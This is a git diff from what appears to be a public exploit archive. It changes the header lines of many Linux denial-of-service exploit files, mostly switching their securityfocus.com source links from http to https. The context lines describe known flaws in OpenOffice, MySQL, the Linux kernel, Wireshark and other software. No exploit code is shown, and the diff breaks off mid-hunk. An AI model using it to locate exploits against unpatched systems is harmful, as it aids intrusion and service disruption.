diff --git a/exploits/linux/dos/30091.py b/exploits/linux/dos/30091.py index 9c5af31bd..b5ffdaa85 100755 --- a/exploits/linux/dos/30091.py +++ b/exploits/linux/dos/30091.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24186/info +source: https://www.securityfocus.com/bid/24186/info The OpenOffice 'Writer' component is prone to a remote denial-of-service vulnerability. diff --git a/exploits/linux/dos/30110.c b/exploits/linux/dos/30110.c index 864305438..4c549ac08 100644 --- a/exploits/linux/dos/30110.c +++ b/exploits/linux/dos/30110.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24246/info +// source: https://www.securityfocus.com/bid/24246/info Bochs is prone to a heap-based buffer-overflow issue and a denial-of-service issue. The buffer-overflow issue occurs because the application fails to bounds-check user-supplied data before copying it into an insufficiently sized memory buffer. The denial-of-service vulnerability is caused by a divide-by-zero operation. diff --git a/exploits/linux/dos/30251.c b/exploits/linux/dos/30251.c index 3c4e44bbf..6022674cf 100644 --- a/exploits/linux/dos/30251.c +++ b/exploits/linux/dos/30251.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24651/info +// source: https://www.securityfocus.com/bid/24651/info The GD graphics library is prone to multiple vulnerabilities. diff --git a/exploits/linux/dos/30430.txt b/exploits/linux/dos/30430.txt index f871d545a..00847698d 100644 --- a/exploits/linux/dos/30430.txt +++ b/exploits/linux/dos/30430.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25117/info +source: https://www.securityfocus.com/bid/25117/info Fail2ban is prone to a remote denial-of-service vulnerability because the application fails to properly ensure the validity of authentication-failure messages. diff --git a/exploits/linux/dos/30444.txt b/exploits/linux/dos/30444.txt index a17d0f441..7cc970cde 100644 --- a/exploits/linux/dos/30444.txt +++ b/exploits/linux/dos/30444.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25170/info +source: https://www.securityfocus.com/bid/25170/info KDE Konqueror is prone to a remote denial-of-service vulnerability because it fails to handle improperly formated HTML code. diff --git a/exploits/linux/dos/30542.txt b/exploits/linux/dos/30542.txt index ccacc8446..b173d7653 100644 --- a/exploits/linux/dos/30542.txt +++ b/exploits/linux/dos/30542.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25481/info +source: https://www.securityfocus.com/bid/25481/info EnterpriseDB Advanced Server is prone to an uninitialized-pointer vulnerability. diff --git a/exploits/linux/dos/30578.txt b/exploits/linux/dos/30578.txt index b7058ad52..9e63b04b4 100644 --- a/exploits/linux/dos/30578.txt +++ b/exploits/linux/dos/30578.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25648/info +source: https://www.securityfocus.com/bid/25648/info MPlayer is prone to a heap-based buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input data. diff --git a/exploits/linux/dos/30579.txt b/exploits/linux/dos/30579.txt index a5c304fa0..8cbd6fca4 100644 --- a/exploits/linux/dos/30579.txt +++ b/exploits/linux/dos/30579.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25650/info +source: https://www.securityfocus.com/bid/25650/info Media Player Classic (MPC) is prone to multiple remote vulnerabilities, including a heap-based buffer-overflow issue and an integer-overflow issue, when handling malformed AVI files. diff --git a/exploits/linux/dos/30580.txt b/exploits/linux/dos/30580.txt index 35e368854..b7a128686 100644 --- a/exploits/linux/dos/30580.txt +++ b/exploits/linux/dos/30580.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25651/info +source: https://www.securityfocus.com/bid/25651/info KMPlayer is prone to multiple denial-of-service vulnerabilities when handling malformed AVI media files. 
diff --git a/exploits/linux/dos/30584.py b/exploits/linux/dos/30584.py index 4dd78e143..a3e857c36 100755 --- a/exploits/linux/dos/30584.py +++ b/exploits/linux/dos/30584.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25676/info +source: https://www.securityfocus.com/bid/25676/info Boa is prone to an authentication-bypass vulnerability because the application fails to ensure that passwords are not overwritten by specially crafted HTTP Requests. diff --git a/exploits/linux/dos/30646.txt b/exploits/linux/dos/30646.txt index 575dc1e21..30d76486b 100644 --- a/exploits/linux/dos/30646.txt +++ b/exploits/linux/dos/30646.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25952/info +source: https://www.securityfocus.com/bid/25952/info Nagios Plugins are prone to a remote buffer-overflow vulnerability because the software fails to properly bounds-check user-supplied data before copying it to an insufficiently sized buffer. diff --git a/exploits/linux/dos/30648.txt b/exploits/linux/dos/30648.txt index 022ab4061..897f90c1d 100644 --- a/exploits/linux/dos/30648.txt +++ b/exploits/linux/dos/30648.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25969/info +source: https://www.securityfocus.com/bid/25969/info AlsaPlayer is prone to a remote buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data before copying it to an insufficiently sized buffer. diff --git a/exploits/linux/dos/30724.txt b/exploits/linux/dos/30724.txt index 573f7afd1..ab67e1082 100644 --- a/exploits/linux/dos/30724.txt +++ b/exploits/linux/dos/30724.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26270/info +source: https://www.securityfocus.com/bid/26270/info Perdition IMAP proxy server is prone to a remote format-string vulnerability because it fails to properly sanitize user-supplied input before passing it as the format specifier to a formatted-printing function. 
diff --git a/exploits/linux/dos/30744.txt b/exploits/linux/dos/30744.txt index 321cbc80a..89675a1d3 100644 --- a/exploits/linux/dos/30744.txt +++ b/exploits/linux/dos/30744.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26353/info +source: https://www.securityfocus.com/bid/26353/info MySQL is prone to a remote denial-of-service vulnerability because the database server fails to properly handle unexpected input. diff --git a/exploits/linux/dos/30763.php b/exploits/linux/dos/30763.php index dcd61d51f..a32c60e58 100644 --- a/exploits/linux/dos/30763.php +++ b/exploits/linux/dos/30763.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26435/info +source: https://www.securityfocus.com/bid/26435/info KDE Konqueror is prone to a remote denial-of-service vulnerability because it fails to handle overly large cookies. diff --git a/exploits/linux/dos/30766.c b/exploits/linux/dos/30766.c index 771fe3748..381aaefc9 100644 --- a/exploits/linux/dos/30766.c +++ b/exploits/linux/dos/30766.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26445/info +// source: https://www.securityfocus.com/bid/26445/info GNU's tar and cpio utilities are prone to a denial-of-service vulnerability because of insecure use of the 'alloca()' function. diff --git a/exploits/linux/dos/30776.txt b/exploits/linux/dos/30776.txt index 0158cce5e..cdb118766 100644 --- a/exploits/linux/dos/30776.txt +++ b/exploits/linux/dos/30776.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26488/info +source: https://www.securityfocus.com/bid/26488/info LIVE555 Media Server is prone to a remote denial-of-service vulnerability because it fails to adequately sanitize user-supplied input. diff --git a/exploits/linux/dos/30837.txt b/exploits/linux/dos/30837.txt index 62859e2f4..5b2c73291 100644 --- a/exploits/linux/dos/30837.txt +++ b/exploits/linux/dos/30837.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26666/info +source: https://www.securityfocus.com/bid/26666/info QEMU is prone to a local denial-of-service vulnerability because it fails to perform adequate boundary checks when handling user-supplied input. diff --git a/exploits/linux/dos/30894.txt b/exploits/linux/dos/30894.txt index 4811a040e..7dccd8fec 100644 --- a/exploits/linux/dos/30894.txt +++ b/exploits/linux/dos/30894.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26899/info +source: https://www.securityfocus.com/bid/26899/info PeerCast is prone to multiple buffer-overflow vulnerabilities because it fails to adequately bounds-check user-supplied input before copying it to an insufficiently sized buffer. diff --git a/exploits/linux/dos/30895.pl b/exploits/linux/dos/30895.pl index 4a3104f18..305bc3824 100755 --- a/exploits/linux/dos/30895.pl +++ b/exploits/linux/dos/30895.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26902/info +source: https://www.securityfocus.com/bid/26902/info The Perl Net::DNS module is prone to a remote denial-of-service vulnerability because the module fails to properly handle malformed DNS responses. diff --git a/exploits/linux/dos/30898.pl b/exploits/linux/dos/30898.pl index 162d8aa2f..c67128ce3 100755 --- a/exploits/linux/dos/30898.pl +++ b/exploits/linux/dos/30898.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26917/info +source: https://www.securityfocus.com/bid/26917/info Common UNIX Printing System (CUPS) is prone to a remote buffer-overflow vulnerability because the software fails to properly bounds-check user-supplied data before copying it to an insufficiently sized buffer. diff --git a/exploits/linux/dos/30902.c b/exploits/linux/dos/30902.c index c6f3e0a54..b740c2dee 100644 --- a/exploits/linux/dos/30902.c +++ b/exploits/linux/dos/30902.c 
@@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/26943/info +source: https://www.securityfocus.com/bid/26943/info The Linux kernel is prone to a remote denial-of-service vulnerability because it fails to adequately validate specially crafted IPv6 'Hop-By-Hop' headers. diff --git a/exploits/linux/dos/30942.c b/exploits/linux/dos/30942.c index 417aac49e..02c8f4a59 100644 --- a/exploits/linux/dos/30942.c +++ b/exploits/linux/dos/30942.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27047/info +// source: https://www.securityfocus.com/bid/27047/info Extended Module Player (xmp) is prone to multiple local buffer-overflow vulnerabilities because it fails to perform adequate boundary checks before copying user-supplied input into an insufficiently sized buffer. diff --git a/exploits/linux/dos/30956.txt b/exploits/linux/dos/30956.txt index 0e53f6b45..75b56f074 100644 --- a/exploits/linux/dos/30956.txt +++ b/exploits/linux/dos/30956.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27061/info +source: https://www.securityfocus.com/bid/27061/info CoolPlayer is prone a buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data. diff --git a/exploits/linux/dos/30985.txt b/exploits/linux/dos/30985.txt index 868a9ce39..293a99a2f 100644 --- a/exploits/linux/dos/30985.txt +++ b/exploits/linux/dos/30985.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27131/info +source: https://www.securityfocus.com/bid/27131/info The GNU Compact Disc Input and Control Library ('libcdio') is prone to multiple buffer-overflow vulnerabilities because it fails to perform adequate boundary checks on user-supplied data. diff --git a/exploits/linux/dos/31002.txt b/exploits/linux/dos/31002.txt index 3f2bf6f63..7dcc4cf29 100644 --- a/exploits/linux/dos/31002.txt +++ b/exploits/linux/dos/31002.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27198/info +source: https://www.securityfocus.com/bid/27198/info The xine-lib library is prone to a remote heap-based buffer-overflow vulnerability. This issue occurs because the software fails to perform adequate boundary checks on user-supplied data. diff --git a/exploits/linux/dos/31018.txt b/exploits/linux/dos/31018.txt index 161fc113d..8fdb39989 100644 --- a/exploits/linux/dos/31018.txt +++ b/exploits/linux/dos/31018.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27249/info +source: https://www.securityfocus.com/bid/27249/info GStreamer is prone to multiple unspecified denial-of-service vulnerabilities when handling malformed media files. diff --git a/exploits/linux/dos/31054.txt b/exploits/linux/dos/31054.txt index d220ee2ea..67584e215 100644 --- a/exploits/linux/dos/31054.txt +++ b/exploits/linux/dos/31054.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27417/info +source: https://www.securityfocus.com/bid/27417/info The SDL_image library is prone to a remote buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input. The issue occurs when handling malformed GIF images. diff --git a/exploits/linux/dos/31218.txt b/exploits/linux/dos/31218.txt index 48ab37108..2757d2ce1 100644 --- a/exploits/linux/dos/31218.txt +++ b/exploits/linux/dos/31218.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27845/info +source: https://www.securityfocus.com/bid/27845/info freeSSHd is prone to a remote denial-of-service vulnerability because it fails to handle exceptional conditions. diff --git a/exploits/linux/dos/31440.txt b/exploits/linux/dos/31440.txt index 118a37fdb..646b2141c 100644 --- a/exploits/linux/dos/31440.txt +++ b/exploits/linux/dos/31440.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28308/info +source: https://www.securityfocus.com/bid/28308/info Asterisk is prone to multiple buffer-overflow vulnerabilities because it fails to perform adequate boundary checks on user-supplied data before copying it to insufficiently sized buffers. diff --git a/exploits/linux/dos/31444.txt b/exploits/linux/dos/31444.txt index d48027492..e435ebc16 100644 --- a/exploits/linux/dos/31444.txt +++ b/exploits/linux/dos/31444.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28351/info +source: https://www.securityfocus.com/bid/28351/info MySQL is prone to a remote denial-of-service vulnerability because it fails to handle certain specially crafted queries. diff --git a/exploits/linux/dos/31552.txt b/exploits/linux/dos/31552.txt index f80782c83..da675bfdc 100644 --- a/exploits/linux/dos/31552.txt +++ b/exploits/linux/dos/31552.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28485/info +source: https://www.securityfocus.com/bid/28485/info Wireshark is prone to multiple denial-of-service vulnerabilities. diff --git a/exploits/linux/dos/31553.txt b/exploits/linux/dos/31553.txt index 29516bf5b..3cf080cae 100644 --- a/exploits/linux/dos/31553.txt +++ b/exploits/linux/dos/31553.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28485/info +source: https://www.securityfocus.com/bid/28485/info Wireshark is prone to multiple denial-of-service vulnerabilities. diff --git a/exploits/linux/dos/31554.txt b/exploits/linux/dos/31554.txt index 6e162ac7d..a606cbde8 100644 --- a/exploits/linux/dos/31554.txt +++ b/exploits/linux/dos/31554.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28485/info +source: https://www.securityfocus.com/bid/28485/info Wireshark is prone to multiple denial-of-service vulnerabilities. diff --git a/exploits/linux/dos/31594.html b/exploits/linux/dos/31594.html index 99efe452c..44ab33ea3 100644 --- a/exploits/linux/dos/31594.html 
+++ b/exploits/linux/dos/31594.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28585/info +source: https://www.securityfocus.com/bid/28585/info Opera Web Browser is prone to multiple security vulnerabilities that may allow remote attackers to execute code. diff --git a/exploits/linux/dos/31713.py b/exploits/linux/dos/31713.py index 35056f0e8..88c47c7d1 100755 --- a/exploits/linux/dos/31713.py +++ b/exploits/linux/dos/31713.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28986/info +source: https://www.securityfocus.com/bid/28986/info PeerCast is prone to multiple buffer-overflow vulnerabilities because it fails to adequately bounds-check user-supplied input before copying it to an insufficiently sized buffer. diff --git a/exploits/linux/dos/31815.html b/exploits/linux/dos/31815.html index 80cdfbe27..991b9dff1 100644 --- a/exploits/linux/dos/31815.html +++ b/exploits/linux/dos/31815.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29312/info +source: https://www.securityfocus.com/bid/29312/info The 'libxslt' library is prone to a buffer-overflow vulnerability because the software fails to perform adequate boundary checks on user-supplied data. diff --git a/exploits/linux/dos/31965.c b/exploits/linux/dos/31965.c index 45fb22723..28a924538 100644 --- a/exploits/linux/dos/31965.c +++ b/exploits/linux/dos/31965.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/29945/info +source: https://www.securityfocus.com/bid/29945/info The Linux kernel is prone to a local denial-of-service vulnerability caused by a race condition. diff --git a/exploits/linux/dos/31966.c b/exploits/linux/dos/31966.c index ba82c41b3..241c0d62a 100644 --- a/exploits/linux/dos/31966.c +++ b/exploits/linux/dos/31966.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/29945/info +source: https://www.securityfocus.com/bid/29945/info The Linux kernel is prone to a local denial-of-service vulnerability caused by a race condition. 
diff --git a/exploits/linux/dos/31968.txt b/exploits/linux/dos/31968.txt index b89451f48..496b7fca5 100644 --- a/exploits/linux/dos/31968.txt +++ b/exploits/linux/dos/31968.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29958/info +source: https://www.securityfocus.com/bid/29958/info GNOME Rhythmbox is prone to a remote denial-of-service vulnerability because it fails to handle specially crafted input. diff --git a/exploits/linux/dos/31979.html b/exploits/linux/dos/31979.html index 71494b5ca..b8df8b7cf 100644 --- a/exploits/linux/dos/31979.html +++ b/exploits/linux/dos/31979.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29961/info +source: https://www.securityfocus.com/bid/29961/info GNOME Evolution is prone to a denial-of-service vulnerability when handling email messages that contain specially crafted HTML. diff --git a/exploits/linux/dos/31984.txt b/exploits/linux/dos/31984.txt index 6f807e5fa..817c3a3b5 100644 --- a/exploits/linux/dos/31984.txt +++ b/exploits/linux/dos/31984.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29984/info +source: https://www.securityfocus.com/bid/29984/info Mozilla Firefox is prone to a remote denial-of-service vulnerability. diff --git a/exploits/linux/dos/32000.txt b/exploits/linux/dos/32000.txt index de81d913b..685ea6435 100644 --- a/exploits/linux/dos/32000.txt +++ b/exploits/linux/dos/32000.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30013/info +source: https://www.securityfocus.com/bid/30013/info OpenLDAP is prone to a remote denial-of-service vulnerability. diff --git a/exploits/linux/dos/32018.txt b/exploits/linux/dos/32018.txt index cba915b94..01504384c 100644 --- a/exploits/linux/dos/32018.txt +++ b/exploits/linux/dos/32018.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30149/info +source: https://www.securityfocus.com/bid/30149/info Multiple vendors' SVG implementations are prone to an unspecified denial-of-service vulnerability. 
diff --git a/exploits/linux/dos/32019.txt b/exploits/linux/dos/32019.txt index 762af6cc7..a579440ec 100644 --- a/exploits/linux/dos/32019.txt +++ b/exploits/linux/dos/32019.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30154/info +source: https://www.securityfocus.com/bid/30154/info The 'libavformat' library from FFmpeg is prone to a remote heap-based buffer-overflow vulnerability because of insufficient boundary checks when parsing STR data. diff --git a/exploits/linux/dos/32095.pl b/exploits/linux/dos/32095.pl index e1e3b06db..8db8745e4 100755 --- a/exploits/linux/dos/32095.pl +++ b/exploits/linux/dos/32095.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30321/info +source: https://www.securityfocus.com/bid/30321/info Asterisk is prone to a remote denial-of-service vulnerability because it fails to handle multiple 'POKE' requests in quick succession. diff --git a/exploits/linux/dos/32112.txt b/exploits/linux/dos/32112.txt index d51a6c522..0fd4110dd 100644 --- a/exploits/linux/dos/32112.txt +++ b/exploits/linux/dos/32112.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30357/info +source: https://www.securityfocus.com/bid/30357/info Minix is prone to a denial-of-service vulnerability. diff --git a/exploits/linux/dos/32248.txt b/exploits/linux/dos/32248.txt index 9677a0705..7123e0e5d 100644 --- a/exploits/linux/dos/32248.txt +++ b/exploits/linux/dos/32248.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30690/info +source: https://www.securityfocus.com/bid/30690/info Yelp is prone to a remote format-string vulnerability because the application fails to properly sanitize user-supplied input before including it in the format-specifier argument of a formatted-printing function. diff --git a/exploits/linux/dos/32292.rb b/exploits/linux/dos/32292.rb index 804c05098..cd3db4e7f 100755 --- a/exploits/linux/dos/32292.rb +++ b/exploits/linux/dos/32292.rb 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30802/info +source: https://www.securityfocus.com/bid/30802/info Ruby is prone to a remote denial-of-service vulnerability in its REXML module. diff --git a/exploits/linux/dos/32304.txt b/exploits/linux/dos/32304.txt index d88f063a8..74cdb8e26 100644 --- a/exploits/linux/dos/32304.txt +++ b/exploits/linux/dos/32304.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30871/info +source: https://www.securityfocus.com/bid/30871/info Red Hat Directory Server is prone to a denial-of-service vulnerability because the server fails to handle specially crafted search patterns. diff --git a/exploits/linux/dos/32348.txt b/exploits/linux/dos/32348.txt index 9041900c1..c436b668c 100644 --- a/exploits/linux/dos/32348.txt +++ b/exploits/linux/dos/32348.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/31081/info +source: https://www.securityfocus.com/bid/31081/info MySQL is prone to a remote denial-of-service vulnerability because it fails to handle empty binary string literals. diff --git a/exploits/linux/dos/32384.txt b/exploits/linux/dos/32384.txt index e1f949e96..2344f536e 100644 --- a/exploits/linux/dos/32384.txt +++ b/exploits/linux/dos/32384.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/31201/info +source: https://www.securityfocus.com/bid/31201/info The Linux kernel is prone to a local denial-of-service vulnerability. diff --git a/exploits/linux/dos/32451.txt b/exploits/linux/dos/32451.txt index 2a0c074a3..93cd8cd16 100644 --- a/exploits/linux/dos/32451.txt +++ b/exploits/linux/dos/32451.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/31536/info +source: https://www.securityfocus.com/bid/31536/info Fedora 8 and 9 Linux kernel is prone to a local denial-of-service vulnerability. diff --git a/exploits/linux/dos/32452.txt b/exploits/linux/dos/32452.txt index 8bb1bf2df..60c6d00a7 100644 --- a/exploits/linux/dos/32452.txt +++ b/exploits/linux/dos/32452.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/31537/info +source: https://www.securityfocus.com/bid/31537/info Adobe Flash Player Plugin is prone to a remote denial-of-service vulnerability. diff --git a/exploits/linux/dos/32471.txt b/exploits/linux/dos/32471.txt index b923e42cb..22eead747 100644 --- a/exploits/linux/dos/32471.txt +++ b/exploits/linux/dos/32471.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/31696/info +source: https://www.securityfocus.com/bid/31696/info KDE Konqueror is prone to a remote denial-of-service vulnerability because it fails to handle specially crafted JavaScript code. diff --git a/exploits/linux/dos/32551.txt b/exploits/linux/dos/32551.txt index 69c86787c..e4edea168 100644 --- a/exploits/linux/dos/32551.txt +++ b/exploits/linux/dos/32551.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/31997/info +source: https://www.securityfocus.com/bid/31997/info Dovecot is prone to a remote denial-of-service vulnerability because it fails to handle certain specially crafted email headers. diff --git a/exploits/linux/dos/32675.py b/exploits/linux/dos/32675.py index c3e215d29..730dabb51 100755 --- a/exploits/linux/dos/32675.py +++ b/exploits/linux/dos/32675.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/32910/info +source: https://www.securityfocus.com/bid/32910/info QEMU and KVM are prone to a remote denial-of-service vulnerability that affects the included VNC server. diff --git a/exploits/linux/dos/32682.c b/exploits/linux/dos/32682.c index d90c623a9..aed5cafaa 100644 --- a/exploits/linux/dos/32682.c +++ b/exploits/linux/dos/32682.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/32985/info +source: https://www.securityfocus.com/bid/32985/info The Linux kernel is prone to a local denial-of-service vulnerability. diff --git a/exploits/linux/dos/32696.txt b/exploits/linux/dos/32696.txt index 05990c86a..9900b6d61 100644 --- a/exploits/linux/dos/32696.txt 
+++ b/exploits/linux/dos/32696.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33085/info +source: https://www.securityfocus.com/bid/33085/info KDE Konqueror is prone to multiple cross-site scripting vulnerabilities and multiple denial-of-service vulnerabilities because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/linux/dos/32697.pl b/exploits/linux/dos/32697.pl index a0c2b3c86..3cf5711e3 100755 --- a/exploits/linux/dos/32697.pl +++ b/exploits/linux/dos/32697.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33096/info +source: https://www.securityfocus.com/bid/33096/info aMSN is prone to a remote denial-of-service vulnerability because the application fails to perform adequate boundary checks on user-supplied input. diff --git a/exploits/linux/dos/32726.txt b/exploits/linux/dos/32726.txt index 414cf4c90..b1c1b581e 100644 --- a/exploits/linux/dos/32726.txt +++ b/exploits/linux/dos/32726.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33299/info +source: https://www.securityfocus.com/bid/33299/info Ganglia is prone to a remote stack-based buffer-overflow vulnerability because the software fails to perform adequate boundary checks on user-supplied input. diff --git a/exploits/linux/dos/32740.txt b/exploits/linux/dos/32740.txt index 8679382fe..361565f27 100644 --- a/exploits/linux/dos/32740.txt +++ b/exploits/linux/dos/32740.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33352/info +source: https://www.securityfocus.com/bid/33352/info QNX RTOS is prone to a local denial-of-service vulnerability. diff --git a/exploits/linux/dos/32749.txt b/exploits/linux/dos/32749.txt index 43a36a6a5..5f27c634e 100644 --- a/exploits/linux/dos/32749.txt +++ b/exploits/linux/dos/32749.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33414/info +source: https://www.securityfocus.com/bid/33414/info Pidgin is prone to a denial-of-service vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/linux/dos/32775.txt b/exploits/linux/dos/32775.txt index 0e7a0f435..cc22db093 100644 --- a/exploits/linux/dos/32775.txt +++ b/exploits/linux/dos/32775.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33618/info +source: https://www.securityfocus.com/bid/33618/info The Linux kernel is prone to a local denial-of-service vulnerability because it fails to properly handle malformed filesystem images. diff --git a/exploits/linux/dos/32800.txt b/exploits/linux/dos/32800.txt index e28490063..243c299d9 100644 --- a/exploits/linux/dos/32800.txt +++ b/exploits/linux/dos/32800.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33749/info +source: https://www.securityfocus.com/bid/33749/info Poppler is prone to multiple denial-of-service vulnerabilities when handling malformed PDF files. diff --git a/exploits/linux/dos/32815.c b/exploits/linux/dos/32815.c index 8a34e857c..2afdd5643 100644 --- a/exploits/linux/dos/32815.c +++ b/exploits/linux/dos/32815.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/33906/info +source: https://www.securityfocus.com/bid/33906/info The Linux kernel is prone to an origin-validation weakness when dealing with signal handling. diff --git a/exploits/linux/dos/32838.txt b/exploits/linux/dos/32838.txt index f8b77944e..9ee60b51a 100644 --- a/exploits/linux/dos/32838.txt +++ b/exploits/linux/dos/32838.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33972/info +source: https://www.securityfocus.com/bid/33972/info MySQL is prone to a remote denial-of-service vulnerability because it fails to handle certain XPath expressions. diff --git a/exploits/linux/dos/32849.txt b/exploits/linux/dos/32849.txt index 103476363..c85674c4b 100644 
--- a/exploits/linux/dos/32849.txt +++ b/exploits/linux/dos/32849.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34090/info +source: https://www.securityfocus.com/bid/34090/info PostgreSQL is prone to a remote denial-of-service vulnerability. diff --git a/exploits/linux/dos/32856.txt b/exploits/linux/dos/32856.txt index 33a7003e5..bbd2c9d69 100644 --- a/exploits/linux/dos/32856.txt +++ b/exploits/linux/dos/32856.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34136/info +source: https://www.securityfocus.com/bid/34136/info MPlayer is prone to multiple denial-of-service vulnerabilities when handling malformed media files. diff --git a/exploits/linux/dos/32857.txt b/exploits/linux/dos/32857.txt index c1e014dd8..6bde20ce5 100644 --- a/exploits/linux/dos/32857.txt +++ b/exploits/linux/dos/32857.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34136/info +source: https://www.securityfocus.com/bid/34136/info MPlayer is prone to multiple denial-of-service vulnerabilities when handling malformed media files. diff --git a/exploits/linux/dos/32961.html b/exploits/linux/dos/32961.html index e1d27295c..39d321edd 100644 --- a/exploits/linux/dos/32961.html +++ b/exploits/linux/dos/32961.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34743/info +source: https://www.securityfocus.com/bid/34743/info Mozilla Firefox is prone to a remote memory-corruption vulnerability. diff --git a/exploits/linux/dos/32964.c b/exploits/linux/dos/32964.c index 0f99f0485..7f8efd501 100644 --- a/exploits/linux/dos/32964.c +++ b/exploits/linux/dos/32964.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34783/info +// source: https://www.securityfocus.com/bid/34783/info GnuTLS is prone to multiple remote vulnerabilities: diff --git a/exploits/linux/dos/32995.txt b/exploits/linux/dos/32995.txt index 65005ef9d..ce5754e1a 100644 --- a/exploits/linux/dos/32995.txt +++ b/exploits/linux/dos/32995.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34944/info +source: https://www.securityfocus.com/bid/34944/info Sendmail is prone to a heap-based buffer-overflow vulnerability because it fails to adequately bounds-check user-supplied input before copying it to an insufficiently sized buffer. diff --git a/exploits/linux/dos/33015.c b/exploits/linux/dos/33015.c index 5b4d3cef9..938efd101 100644 --- a/exploits/linux/dos/33015.c +++ b/exploits/linux/dos/33015.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/35143/info +source: https://www.securityfocus.com/bid/35143/info The Linux kernel is prone to a local denial-of-service vulnerability. diff --git a/exploits/linux/dos/33017.txt b/exploits/linux/dos/33017.txt index 9746b13fb..46a3b607f 100644 --- a/exploits/linux/dos/33017.txt +++ b/exploits/linux/dos/33017.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35148/info +source: https://www.securityfocus.com/bid/35148/info Adobe Acrobat is prone to a denial-of-service vulnerability because it fails to perform adequate boundary checks on user-supplied data. diff --git a/exploits/linux/dos/33020.py b/exploits/linux/dos/33020.py index 5bde7ee74..9e7a25c7f 100755 --- 